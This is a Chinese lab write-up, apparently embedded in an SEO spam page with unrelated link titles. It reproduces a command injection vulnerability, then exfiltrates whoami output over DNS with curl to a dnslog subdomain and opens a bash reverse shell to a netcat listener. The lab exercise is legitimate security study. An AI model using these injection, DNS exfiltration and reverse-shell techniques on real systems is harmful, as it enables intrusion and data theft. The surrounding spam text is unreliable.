当前位置: 首页 > news >正文

免费做ppt的软件seo 网站排名

免费做ppt的软件,seo 网站排名,帝国cms网站公告怎么做,免费空间网站怎么做的任务一: 复现环境中的命令注入漏洞。 任务二: 利用命令注入执行whoami,使用DNS外带技术获取结果 任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。 任务一: 1.搭建好环境 2.先去了…

任务一:
复现环境中的命令注入漏洞。
任务二:
利用命令注入执行whoami,使用DNS外带技术获取结果
任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。

任务一:
1.搭建好环境
在这里插入图片描述
在这里插入图片描述
2.先去了解一下这个网站的功能
在这里插入图片描述
在这里插入图片描述
3.首先查看存在的metric,发现在这里是0
在这里插入图片描述
4.我们写入一个metric,首先利用burpsuite进行抓包然后用post请求添加请求体加入metric,然后我们再次查看metrics发现我们已经成功写入一个metric。
在这里插入图片描述
在这里插入图片描述
5.然后进行代码执行漏洞,在tmp下创建一个success文件,得到回显

在这里插入图片描述

在这里插入图片描述
6.然后进入容器中查看(一定要查看创建的文件路径,其他的包含任何的都不是,因为这个找了好久好久,其实很早就做出来了,还以为做错了,无语死了)。

在这里插入图片描述
任务二:
1.直接把输出的whoami重定向到1.txt文件里面(中间要用%20作为空格,不然会失败,因为这个卡了好久,看到burpsuite的颜色那里不对了)

在这里插入图片描述
2.查看1.txt文件,发现我是root。
在这里插入图片描述

3.如果是利用DNS外带技术获得结果的话
首先登入dnslog.cn,然后点击get subdomain获得专属的子域名。
在这里插入图片描述
4.然后使用curl $(whoami).子域名,然后上面回显的时候出现了(root.子域名),得到(这里有一个问题,最开始用的ping,一直没ping通,不知道为啥)
在这里插入图片描述
任务三:
1.用(bash -c “bash -i ·········“)
在这里插入图片描述
2.这里试了很久自己的反弹shell都不成功,然后试了很多次,先是把端口打开了,用ufw添加端口 ufw allow +端口,然后把自己的nc变成了 nc -lvp +端口,然后再sec一次,反弹成功了。
在这里插入图片描述

在这里插入图片描述

http://www.khdw.cn/news/38275.html

相关文章:

  • 做网站开源框架关于友谊的连接
  • 免费素材下载网站aso优化运营
  • 会员wordpress主题二十个优化
  • 常州市做网站的公司百度推广河南总部
  • 做网站的毕设用什么软件在线教育
  • 网站建设策划案模板新手怎么做电商运营
  • 广西建设工程质量安全监督总站网站宁波品牌网站推广优化公司
  • 简约中文网站设计欣赏qq推广官网
  • 济南迅翔网站建设个人在百度上发广告怎么发
  • 牡丹花网站建设策划书神马网站快速排名软件
  • 网页设计总结收获和体会网站优化策略分析
  • begin wordpress主题seo优化器
  • 果洛wap网站建设哪家好武汉楼市最新消息
  • 网络公司做网站服务器个人网站建设
  • 信用公示信息系统官网seo网站
  • app网站制作多少钱企业培训课程价格
  • asp做网站的步骤百度app手机版
  • 协会网站建设方案在线排名优化工具
  • php 网站开发流程百度健康
  • 国际要闻头条最新成都公司网站seo
  • 上饶婚纱工作室网站建设seo要点
  • 电商网站开发外包怎么在网上做广告
  • 做骗子网站宁波关键词优化企业网站建设
  • 做推广用那个网站迅雷磁力
  • 专业网站建设公司哪家专业加强网络暴力治理
  • 杭州网站建设网seo案例
  • 触屏版网站模板如何策划一个营销方案
  • 可以做兼职的网站有哪些工作室怎么接游戏推广的业务
  • 汕头市门户网站建设百度网络优化
  • 网站建设买服务器还是数据库小学生简短小新闻十条